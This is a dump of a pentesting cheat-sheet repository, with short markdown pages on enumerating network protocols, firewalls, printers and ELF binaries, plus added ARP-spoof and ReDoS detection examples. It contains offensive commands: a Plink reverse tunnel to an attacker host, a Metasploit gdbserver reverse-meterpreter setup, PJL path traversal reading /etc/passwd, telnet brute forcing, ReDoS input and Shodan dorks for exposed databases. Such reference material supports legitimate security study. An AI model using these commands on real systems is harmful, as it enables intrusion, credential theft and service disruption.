42 | # -A: append rule
43 | # -i: input interface
44 | # -j: jump to target
45 | iptables -A FORWARD -i eth0 -j ACCEPT
46 | ```
47 |
48 |
49 |
50 | ## Find MAC Address
51 |
52 | ```sh
53 | cat /sys/class/net/eth0/address
54 | cat /sys/class/net/enp0s3/address
55 | cat /sys/class/net/tun0/address
56 | ```
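The detection side of the flow above, as an added example that is not a tool from this page: it parses Ethernet/ARP frames and alerts when an IP address that was learned with one MAC is claimed by another, which is exactly what an ARP spoofing tool puts on the wire. `build_arp_reply()`, `parse_arp()`, `ArpWatch` and the frames in `run_sample()` are this example's own constructions; there is no live capture here (on Linux you would feed `ArpWatch.observe()` from an `AF_PACKET` raw socket, which needs root).

```python
"""Parse ARP frames and alert when an IP's MAC binding changes, the signature
of ARP spoofing. Added example; not part of any tool on this page.
build_arp_reply(), parse_arp(), ArpWatch and the frames in run_sample() are
this example's own constructions."""
import ipaddress
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def _mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP 'is-at' frame: what a spoofer sends to the victim."""
    eth = _mac_bytes(target_mac) + _mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)          # Ethernet / IPv4
    arp += _mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += _mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not
    IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": oper,
        "sender_mac": _mac_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": _mac_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


class ArpWatch:
    """Learn the first MAC seen for each IP and report any frame that claims
    the IP for a different MAC (arpwatch-style 'flip flop'). Each conflicting
    (ip, mac) pair is reported once to keep the output readable."""

    def __init__(self, gateway_ip=None):
        self.gateway_ip = gateway_ip
        self.table = {}          # ip -> first MAC seen
        self.reported = set()

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt["sender_ip"] == "0.0.0.0":   # ignore ARP probes
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known == mac or (ip, mac) in self.reported:
            return None
        self.reported.add((ip, mac))
        kind = "gateway" if ip == self.gateway_ip else "host"
        return f"ARP conflict for {kind} {ip}: learned {known}, now claimed by {mac}"


def run_sample():
    """Constructed trace: legitimate gateway and victim, then an attacker
    claiming the gateway's IP twice. Returns the alerts raised."""
    gw_mac, victim_mac, attacker_mac = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:10", "02:00:00:de:ad:01"
    frames = [
        build_arp_reply(gw_mac, "192.168.1.1", victim_mac, "192.168.1.10"),
        build_arp_reply(victim_mac, "192.168.1.10", gw_mac, "192.168.1.1"),
        build_arp_reply(attacker_mac, "192.168.1.1", victim_mac, "192.168.1.10"),   # spoof
        build_arp_reply(attacker_mac, "192.168.1.1", victim_mac, "192.168.1.10"),   # repeated
    ]
    watch = ArpWatch(gateway_ip="192.168.1.1")
    return [alert for alert in map(watch.observe, frames) if alert]


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

The first binding seen is trusted, so start the watcher while the network is known-good (or seed `table` from a static inventory); a legitimate NIC replacement will also trigger one alert, which is the expected trade-off for this kind of monitor.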
--------------------------------------------------------------------------------
/src/exploit/network/attack/_data.yml:
--------------------------------------------------------------------------------
1 | category2: attack
--------------------------------------------------------------------------------
/src/exploit/network/eternetip-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: EthernetIP Pentesting
3 | description: EtherNet/IP is an industrial network protocol that adapts the Common Industrial Protocol (CIP) to standard Ethernet. A default port is 44818.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-01-27
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script enip-info -p 44818 <target-ip>
15 | ```
--------------------------------------------------------------------------------
/src/exploit/network/firewall.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Firewall
3 | description: It's a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-11
8 | draft: false
9 | ---
10 |
11 | ## Status
12 |
13 | ```sh
14 | ufw status
15 | ufw status verbose
16 | ```
17 |
18 |
19 |
20 | ## Enable/Disable the Firewall
21 |
22 | ```sh
23 | ufw enable
24 |
25 | ufw disable
26 | ```
27 |
28 |
29 |
30 | ## Set Default Policies
31 |
32 | ```sh
33 | # Allow all incoming traffic by default (the direction defaults to incoming)
34 | ufw default allow
35 |
36 | # Deny all incoming traffic by default
37 | ufw default deny
38 | ```
39 |
40 |
41 |
42 | ## Rules
43 |
44 | - **Allow**
45 |
46 | ```sh
47 | ufw allow 22
48 | ufw allow 22/tcp
49 | ufw allow 80
50 | ufw allow 80/tcp
51 |
52 | # Allow the given ip address access to port 22 for all protocols
53 | ufw allow from <ip-address> to any port 22
54 | ```
55 |
56 | - **Deny**
57 |
58 | ```sh
59 | ufw deny 22
60 | ufw deny 22/tcp
61 | ufw deny 80
62 | ufw deny 80/tcp
63 | ```
--------------------------------------------------------------------------------
/src/exploit/network/grpc-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: gRPC Pentesting
3 | description: gRPC is a cross-platform open source high performance remote procedure call framework that runs over HTTP/2. It is commonly exposed on 80 or 443, and the official examples use port 50051.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-05-28
8 | draft: false
9 | ---
10 |
11 | ## Connect with [grpcui](https://github.com/fullstorydev/grpcui)
12 |
13 | **`grpcui`** is an interactive web UI for **gRPC**.
14 | If you don’t have `grpcui`, you need to install it.
15 |
16 | ```bash
17 | go install github.com/fullstorydev/grpcui/cmd/grpcui@latest
18 | ```
19 |
20 | Then we can interact with the gRPC service from a browser. `grpcui` discovers the service's methods through server reflection, so if reflection is disabled you have to supply the `.proto` files with `-proto`.
21 |
22 | ```bash
23 | grpcui -plaintext example.com:9019   # -plaintext: connect without TLS
24 | ```
--------------------------------------------------------------------------------
/src/exploit/network/port-forwarding/_data.yml:
--------------------------------------------------------------------------------
1 | category2: port-forwarding
--------------------------------------------------------------------------------
/src/exploit/network/port-forwarding/port-forwarding-with-plink.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Port Forwarding with Plink
3 | description: Plink is a Windows command line version of the PuTTY SSH client.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-03-19
8 | draft: false
9 | ---
10 |
11 | ## Reverse Connection
12 |
13 | ### 1. Open Listener in Your Local Machine
14 |
15 | ```sh
16 | nc -lvnp 4444
17 | ```
18 |
19 | ### 2. Run Reverse Connection in Target Machine
20 |
21 | First of all, generate an SSH key pair on the attacker machine. Two keys (public and private) will be generated: add the public key to `~/.ssh/authorized_keys` on the attacker's SSH server, and copy the private key to the target.
22 |
23 | ```sh
24 | ssh-keygen
25 | ```
26 |
27 | Convert the private key to PuTTY's `.ppk` format so that plink can use it.
28 |
29 | ```sh
30 | puttygen private_key -o private_key.ppk
31 | ```
32 |
33 | Run the reverse connection using plink. `echo y` accepts the attacker's host key non-interactively, `-R` opens a listener on the attacker side that is forwarded to a host and port reachable from the target, and `-N` opens no shell.
34 |
35 | ```powershell
36 | cmd.exe /c echo y | .\plink.exe -R <attacker-port>:<target-host>:<target-port> attacker@<attacker-ip> -i private_key.ppk -N
37 | ```
38 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/_data.yml:
--------------------------------------------------------------------------------
1 | category2: protocol
--------------------------------------------------------------------------------
/src/exploit/network/protocol/dhcp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: DHCP (Dynamic Host Configuration Protocol) Pentesting
3 | description: DHCP uses UDP. Port 67 is for a server, port 68 is for a client.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-10
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script broadcast-dhcp-discover -p 67,68
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/irc-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: IRC (Internet Relay Chat) Pentesting
3 | description: IRC is a protocol that allows the communication in the form of text between multiple parties. Default ports are 194,6667.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-02-26
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6667 <target-ip>
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/memcache-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Memcache Pentesting
3 | description: Memcached is a general-purpose distributed memory caching system. A default port is 11211.
4 | tags:
5 | - Web
6 | refs:
7 | - https://book.hacktricks.xyz/network-services-pentesting/11211-memcache
8 | date: 2023-02-23
9 | draft: false
10 | ---
11 |
12 | ## Communication
13 |
14 | We can communicate with a memcached server using Netcat. The text protocol has no authentication by default, so anything that can reach port 11211 can dump the cache.
15 |
16 | ```bash
17 | nc -vn <target-ip> 11211
18 | Connection to <target-ip> 11211 port [tcp/*] succeeded!
19 |
20 | # Commands in nc
21 | version
22 | stats
23 | stats slabs
24 | stats items                      # slab ids to use with cachedump
25 | stats cachedump <slab-id> <limit>  # list keys in a slab (limit 0 = all)
26 | stats cachedump 1 0
27 | get <key>
28 | ```
--------------------------------------------------------------------------------
/src/exploit/network/protocol/modbus-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Modbus Pentesting
3 | description: Modbus is a data communications protocol. A default port is 502.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-01-06
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 <target-ip>
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/ntp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: NTP (Network Time Protocol) Pentesting
3 | description: NTP is a networking protocol for clock synchronization between computer systems over packet-switched networks. The default port is 123 and it uses UDP.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script ntp-info -p 123
15 | nmap -sU --script ntp-monlist -p 123
16 | nmap -sU --script ntp* -p 123
17 | nmap -sU --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123
18 | ```
19 |
20 | ### Ntpq
21 |
22 | ```sh
23 | ntpq -c readlist <target-ip>
24 | ntpq -c readvar <target-ip>
25 | ntpq -c peers <target-ip>
26 | ntpq -c associations <target-ip>
27 | ntpdc -c monlist <target-ip>    # lists recent clients; the amplification vector behind NTP reflection DDoS
28 | ntpdc -c listpeers <target-ip>
29 | ntpdc -c sysinfo <target-ip>
30 | ```
31 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/pptp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PPTP Pentesting
3 | description: PPTP is one of the first VPN protocols. It relies on the MPPE (Microsoft Point-to-Point Encryption) protocol. A default port is 1723.
4 | tags:
5 | - VPN
6 | refs:
7 | - https://www.linkedin.com/pulse/common-vpn-vulnerabilities-exploits-abed-a-a-
8 | date: 2023-10-05
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```bash
15 | nmap --script pptp-version -p 1723 <target-ip>
16 | ```
17 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/telnet-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Telnet Pentesting
3 | description: Telnet is an application protocol used on the internet or local area network. A default port is 23.
4 | tags:
5 | - Network
6 | - Telnet
7 | refs:
8 | date: 2023-10-30
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```sh
15 | nmap --script telnet-encryption -p 23 <target-ip>
16 | nmap --script telnet-ntlm-info -p 23 <target-ip>
17 | nmap --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=8s -p 23 <target-ip>
18 | ```
19 |
20 |
21 |
22 | ## Configuration Files
23 |
24 | ```bash
25 | cat /etc/inetd.conf
26 | # or
27 | cat /etc/xinetd.d/telnet
28 | ```
29 |
30 |
31 |
32 | ## Connect
33 |
34 | ```sh
35 | telnet <target-ip>
36 | telnet <target-ip> 23
37 | ```
38 |
--------------------------------------------------------------------------------
/src/exploit/network/protocol/tftp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: TFTP (Trivial File Transfer Protocol) Pentesting
3 | description: TFTP is a simple lockstep file transfer protocol which allows a client to get a file from or put a file onto a remote host. It uses UDP. A default port is 69.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-10-30
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script tftp-enum -p 69 <target-ip>
15 | ```
16 |
17 |
18 |
19 | ## Configuration Files
20 |
21 | ```bash
22 | cat /etc/inetd.conf
23 | # or
24 | cat /etc/xinetd.d/tftp
25 | ```
--------------------------------------------------------------------------------
/src/exploit/network/protocol/upnp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: UPnP (Universal Plug and Play) Pentesting
3 | description: UPnP is a network protocol that allows devices to discover and interact with each other seamlessly over a local network. Default ports are 1900 (UDP) and 5000 (TCP).
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-02-25
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap -sU --script upnp-info -p 1900 <target-ip>
15 | nmap --script upnp-info -p 5000 <target-ip>
16 | nmap --script broadcast-upnp-info -p 1900
17 | ```
--------------------------------------------------------------------------------
/src/exploit/network/protocol/waste-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: WASTE Pentesting
3 | description: A peer-to-peer and end-to-end protocol and software application. The ports often used are 1337, 31337.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Connect
12 |
13 | ```sh
14 | connect <target-ip> 1337
15 | # or
16 | nc <target-ip> 1337
17 | ```
--------------------------------------------------------------------------------
/src/exploit/network/redos.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ReDoS (Regular Expression Denial of Service)
3 | description: ReDoS is a denial-of-service attack against regular expressions whose matching time grows exponentially on crafted input (catastrophic backtracking), so a single request can keep a CPU busy for seconds or minutes.
4 | tags:
5 | - Network
6 | refs:
7 | - https://en.wikipedia.org/wiki/ReDoS#Examples
8 | - https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
9 | date: 2023-10-12
10 | draft: false
11 | ---
12 |
13 | ## Evil (Vulnerable) Regex
14 |
15 | ```txt
16 | (a+)+
17 | ([a-zA-Z]+)*
18 | (a|aa)+
19 | (a|a?)+
20 | (.*a){x} for x > 10
21 | ^(([a-z])+.)+[A-Z]([a-z])+$
22 |
23 | # Email validation regex with a nested quantifier: (([\-.]|[_]+)?([a-zA-Z0-9]+))*
24 | /^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/
25 | ```
26 |
27 |
28 |
29 | ## Malicious Input
30 |
31 | If a target website validates user input with one of the vulnerable regexes above, an input made of many characters that the repeated group can match, followed by one character that makes the overall match fail, forces the engine to try every way of splitting the run between the nested quantifiers before it gives up. The work doubles with every extra `a`, so a few dozen characters are enough to tie up a CPU for seconds to minutes:
32 |
33 | ```bash
34 | aaaaaaaaaaaaaaaaaaaaaaaa!
35 | ```
36 |
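To make both sections concrete, here is an added example (not from the OWASP or Wikipedia references) that flags the nested-quantifier shape statically by walking Python's regex parse tree, and measures how the match time of `(a+)+` on `aaaa...!` grows with the input. `has_nested_quantifier()` and `match_seconds()` are this example's own names; only nested quantifiers are detected, so overlapping alternations such as `(a|aa)+` are out of scope for the static check.

```python
"""Flag regexes with nested quantifiers and measure catastrophic backtracking.
Added example (not from the OWASP or Wikipedia references); the function names
has_nested_quantifier and match_seconds are this example's own. Only nested
quantifiers are detected, so overlapping alternations such as (a|aa)+ are
out of scope here."""
import re
import time

try:                                      # Python 3.11+ keeps the parser here
    from re import _parser as sre_parse
except ImportError:                       # older versions
    import sre_parse

REPEAT_OPS = {"MAX_REPEAT", "MIN_REPEAT", "POSSESSIVE_REPEAT"}


def _children(op, av):
    """Yield the sub-patterns nested inside one parsed node."""
    name = op.name
    if name in REPEAT_OPS:                  # av = (min, max, subpattern)
        yield av[2]
    elif name == "SUBPATTERN":              # av = (..., subpattern)
        yield av[-1]
    elif name == "BRANCH":                  # av = (None, [alternatives])
        yield from av[1]
    elif name in ("ASSERT", "ASSERT_NOT"):  # av = (direction, subpattern)
        yield av[1]
    elif name == "ATOMIC_GROUP":            # av = subpattern (3.11+)
        yield av
    elif name == "GROUPREF_EXISTS":         # av = (group, yes, no-or-None)
        yield from (sub for sub in av[1:] if sub is not None)


def _is_repeat(op, av):
    """A quantifier that can match its body more than once."""
    return op.name in REPEAT_OPS and av[1] > 1


def _contains_repeat(sub):
    for op, av in sub:
        if _is_repeat(op, av) or any(_contains_repeat(c) for c in _children(op, av)):
            return True
    return False


def has_nested_quantifier(pattern):
    """True when a repeated group itself contains a repeat, e.g. (a+)+ or
    ^(([a-z])+.)+[A-Z]([a-z])+$, the shape behind exponential backtracking."""
    def walk(sub):
        for op, av in sub:
            if _is_repeat(op, av) and _contains_repeat(av[2]):
                return True
            if any(walk(c) for c in _children(op, av)):
                return True
        return False
    return walk(sre_parse.parse(pattern))


def match_seconds(pattern, text):
    """Wall-clock seconds for one full-match attempt; re has no timeout."""
    compiled = re.compile(pattern)
    start = time.perf_counter()
    compiled.fullmatch(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    for pat in (r"(a+)+", r"([a-zA-Z]+)*", r"^(([a-z])+.)+[A-Z]([a-z])+$", r"a+b+"):
        print(f"{pat:35} nested quantifier: {has_nested_quantifier(pat)}")
    # Each extra 'a' roughly doubles the time: the '!' guarantees failure, so
    # the engine tries every split of the run between the two quantifiers.
    for n in (10, 14, 18, 20):
        print(f"n={n:2d}  {match_seconds(r'(a+)+', 'a' * n + '!'):.3f}s")
```

Python's `re` cannot be interrupted once it starts backtracking, so the static check belongs in code review or a linter; at runtime, limit input length before matching, or use the third-party `regex` module, whose matching functions accept a `timeout` argument.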
--------------------------------------------------------------------------------
/src/exploit/network/tool/_data.yml:
--------------------------------------------------------------------------------
1 | category2: tool
--------------------------------------------------------------------------------
/src/exploit/network/tool/decrypt-putty-sessions-files.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Decrypt SolarPuTTY Sessions Files
3 | description:
4 | tags:
5 | - Network
6 | refs:
7 | date: 2024-12-06
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | Python code is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5)
14 |
15 | ```sh
16 | python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt
17 | ```
--------------------------------------------------------------------------------
/src/exploit/network/vpn/_data.yml:
--------------------------------------------------------------------------------
1 | category2: vpn
--------------------------------------------------------------------------------
/src/exploit/network/vpn/ipsec-vpn-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: IPsec VPN Pentesting
3 | description: IPsec (Internet Protocol Security) is a secure network protocol suite that authenticates and encrypts IP packets to provide secure communication between two hosts. It is used in VPNs (Virtual Private Networks). IKE, the key exchange used by IPsec, listens on UDP 500 (and UDP 4500 for NAT traversal); SSL VPN gateways such as Cisco AnyConnect listen on TCP 443.
4 | tags:
5 | - VPN
6 | refs:
7 | date: 2022-12-26
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap --script http-cisco-anyconnect -p 443 <target-ip>
15 | nmap -sU --script ike-version -p 500 <target-ip>
16 | ```
--------------------------------------------------------------------------------
/src/exploit/network/wifi/_data.yml:
--------------------------------------------------------------------------------
1 | category2: wifi
--------------------------------------------------------------------------------
/src/exploit/network/wifi/wifi-password-recovery.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: WiFi Password Recovery
3 | description: If we forget a WiFi password, we may be able to recover it from the profiles the operating system has saved.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2023-07-15
8 | draft: false
9 | ---
10 |
11 | ## Windows
12 |
13 | Open Command Prompt as Administrator and then execute the following commands:
14 |
15 | ```sh
16 | # Show all network names you've accessed and saved
17 | netsh wlan show profile
18 |
19 | # Show the details of the specific network including password
20 | netsh wlan show profile name="network-name" key=clear
21 | ```
22 |
23 |
24 |
25 | ## Linux
26 |
27 | ```sh
28 | ls -al /etc/NetworkManager/system-connections/
29 | cat /etc/NetworkManager/system-connections/example.nmconnection
30 | ```
31 |
--------------------------------------------------------------------------------
/src/exploit/printer/_data.yml:
--------------------------------------------------------------------------------
1 | category1: printer
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/printer/raw-printing-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Raw Printing Pentesting
3 | description: PJL (Printer Job Language) is a command language for switching printer languages and for querying and controlling the printer. A default port is 9100 (raw printing).
4 | tags:
5 | - Printer
6 | refs:
7 | - https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf
8 | - https://book.hacktricks.xyz/network-services-pentesting/9100-pjl
9 | date: 2023-07-19
10 | draft: false
11 | ---
12 |
13 | ## Enumeration
14 |
15 | ```sh
16 | nmap --script pjl-ready-message -p 9100 <target-ip>
17 | ```
18 |
19 |
20 |
21 | ## Connect
22 |
23 | ```bash
24 | nc <target-ip> 9100
25 | ```
26 |
27 |
28 |
29 | ## Commands
30 |
31 | ```bash
32 | # See printer information
33 | @PJL INFO STATUS
34 | @PJL INFO ID
35 | @PJL INFO PRODINFO
36 |
37 | # See directories in the system
38 | @PJL FSDIRLIST NAME="0:" ENTRY=1
39 | @PJL FSDIRLIST NAME="0:/../" ENTRY=1
40 | @PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1
41 | @PJL FSDIRLIST NAME="0:/../home/" ENTRY=1
42 |
43 | # See contents of a file (FSUPLOAD takes OFFSET/SIZE in bytes, not ENTRY; not every printer implements the file system commands)
44 | @PJL FSUPLOAD NAME="0:/../etc/passwd" OFFSET=0 SIZE=4096
45 | ```
--------------------------------------------------------------------------------
/src/exploit/privacy/_data.yml:
--------------------------------------------------------------------------------
1 | category1: tor
2 | related_menus:
3 | - title: Tor
4 | id: tor
--------------------------------------------------------------------------------
/src/exploit/privacy/tor/_data.yml:
--------------------------------------------------------------------------------
1 | category2: tor
--------------------------------------------------------------------------------
/src/exploit/quantum/_data.yml:
--------------------------------------------------------------------------------
1 | category1: quantum
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/quantum/read-qasm.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Read QASM
3 | description: QASM (Quantum Assembly Language) is a language used to program quantum computers. It is similar in concept to assembly language used in classical computers, but instead of operating on bits, QASM operates on quantum bits (qubits).
4 | tags:
5 | - Quantum
6 | refs:
7 | - https://github.com/Taoudi/Cyber_Apocalypse/blob/main/HTB.ipynb
8 | date: 2023-03-26
9 | draft: false
10 | ---
11 |
12 | ## Install Qiskit
13 |
14 | ```bash
15 | pip install oqi qiskit
16 | ```
17 |
18 |
19 |
20 | ## Read QASM
21 |
22 | ```python
23 | from qiskit import QuantumCircuit, transpile
24 | from qiskit.providers.aer import QasmSimulator  # Qiskit >= 1.0: pip install qiskit-aer and use "from qiskit_aer import AerSimulator"
25 | from qiskit.visualization import plot_histogram
26 |
27 | simulator = QasmSimulator()
28 | circuit = QuantumCircuit.from_qasm_file('example.qasm')
29 | compiled_circuit = transpile(circuit, simulator)
30 | job = simulator.run(compiled_circuit, shots=1000)
31 | result = job.result()
32 |
33 | counts = result.get_counts(compiled_circuit)
34 | print(counts)
35 | ```
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/_data.yml:
--------------------------------------------------------------------------------
1 | category1: reconnaissance
2 | related_menus:
3 | - title: OSINT
4 | id: osint
5 | - title: Search Technique
6 | id: search-technique
7 | - title: Network
8 | id: network
9 | - title: Subdomain
10 | id: subdomain
11 | - title: Others
12 | id: others
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/network/_data.yml:
--------------------------------------------------------------------------------
1 | category2: network
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/osint/_data.yml:
--------------------------------------------------------------------------------
1 | category2: osint
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/search-technique/_data.yml:
--------------------------------------------------------------------------------
1 | category2: search-technique
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/search-technique/shodan-dorks.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Shodan Dorks
3 | description: Shodan is a search engine that lets us find internet-facing servers and devices by filters. This page lists queries for locating specific services.
4 | tags:
5 | - OSINT
6 | - Reconnaissance
7 | refs:
8 | - https://systemweakness.com/how-to-find-open-elasticsearch-databases-using-shodan-fb9314af604a
9 | date: 2023-07-14
10 | draft: false
11 | ---
12 |
13 | ```bash
14 | product:elastic port:9200 country:us
15 | product:postgresql port:5432 country:jp
16 |
17 | # Search 'users' column
18 | product:elastic port:9200 users
19 | ```
20 |
--------------------------------------------------------------------------------
/src/exploit/reconnaissance/subdomain/_data.yml:
--------------------------------------------------------------------------------
1 | category2: subdomain
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/_data.yml:
--------------------------------------------------------------------------------
1 | category1: reverse-engineering
2 | related_menus:
3 | - title: Assembly
4 | id: assembly
5 | - title: Cheatsheet
6 | id: cheatsheet
7 | - title: Reversing
8 | id: reversing
9 | - title: Debugger
10 | id: debugger
11 | - title: Others
12 | id: others
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/assembly/_data.yml:
--------------------------------------------------------------------------------
1 | category2: assembly
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/cheatsheet/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cheatsheet
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/debugger/_data.yml:
--------------------------------------------------------------------------------
1 | category2: debugger
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/debugger/gdbserver-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: GdbServer Pentesting
3 | description:
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-07-17
8 | draft: false
9 | ---
10 |
11 | ## Reverse Shell with Metasploit
12 |
13 | ```bash
14 | msfconsole
15 | msf> use exploit/multi/gdb/gdb_server_exec
16 | msf> set payload linux/x64/meterpreter/reverse_tcp
17 | msf> set rhost
18 | msf> set rport
19 | msf> set lhost
20 | msf> set lport
21 | msf> run
22 | ```
23 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/_data.yml:
--------------------------------------------------------------------------------
1 | category2: reversing
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-elf.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing ELF (Executable and Linking Format)
3 | description: ELF is the standard file format for executables on Linux.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-02-18
8 | draft: false
9 | ---
10 |
11 | ## Static Analysis
12 |
13 | ```sh
14 | # -a: All
15 | readelf ./sample -a
16 | # -p: Dump the contents of section
17 | readelf ./sample -p .data
18 | readelf ./sample -p .text
19 | readelf ./sample -p .interp
20 |
21 | # Switch between MSB (big-endian) and LSB (little-endian) by editing the EI_DATA byte (offset 5) of the ELF header.
22 | hexedit ./sample
23 | (MSB) 7F 45 4C 46 02 02 01 ... <=> (LSB) 7F 45 4C 46 02 01 01 ...
24 |
25 | # Display shared object dependencies
26 | ldd ./sample
27 | ```
28 |
29 |
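Added example (not from Exploit Notes): a small Python parser for the ELF header that mirrors what `readelf -h` prints and shows why the EI_DATA byte edited above matters. The sample header is constructed inside the script; `build_elf64_header`, `parse_elf_header` and `flip_ei_data` are names chosen here.

```python
import struct

ELF_MAGIC = b"\x7fELF"
EI_CLASS = {1: "ELF32", 2: "ELF64"}
EI_DATA = {1: "LSB (little-endian)", 2: "MSB (big-endian)"}
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINE = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}


def build_elf64_header(little_endian=True, e_entry=0x401040):
    """Constructed sample: a structurally valid 64-byte ELF64 header (x86-64, ET_EXEC).
    Only the header is built; it is illustrative, not a binary from the page."""
    endian = "<" if little_endian else ">"
    # e_ident: magic, EI_CLASS, EI_DATA, EI_VERSION, EI_OSABI, EI_ABIVERSION, 7 bytes padding
    e_ident = ELF_MAGIC + bytes([2, 1 if little_endian else 2, 1, 0, 0]) + b"\x00" * 7
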